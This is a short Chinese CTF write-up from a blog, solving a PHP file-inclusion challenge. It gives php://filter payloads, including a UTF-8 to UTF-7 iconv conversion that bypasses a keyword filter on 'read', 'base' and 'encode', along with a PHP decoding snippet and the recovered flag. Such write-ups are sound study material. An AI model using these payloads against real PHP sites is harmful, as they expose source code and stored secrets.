file_include-wp

看名字一个文件包含题目:

图片[1]-file_include-wp-Drton1博客

那就是文件包含漏洞那些 利用那些伪协议了

先来个基础的payload:

/?filename=php://filter/read=convert.base64encode/resource=flag.php

发现被被提示了 说明有字符触碰到他过滤规则了。

图片[2]-file_include-wp-Drton1博客

在经过一番尝试发现是read,base ,encode 触碰它关键字了

也就是说要绕过这个三个字实现读取 既然不让用base64编码 就换一个 utf8 或者utf7

convert.utf8.utf7 把read去除 ,试试能不能绕过

iconv.UTF8.UTF7 把flag.php文件UTF-8编码 转为UTF-7编码 并输出:

图片[3]-file_include-wp-Drton1博客

再构造解码的脚本:

<?php 
$a=”+ADw?php +ACQ-flag+AD0'cyberpeace+AHs-61045a0d03093dd9933288c6dbcd0238+AH0'+ADs”;
echo iconv(”UTF7”,”UTF8”,$a);
图片[4]-file_include-wp-Drton1博客

flag=cyberpeace{61045a0d03093dd9933288c6dbcd0238}

© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 共1条

请登录后发表评论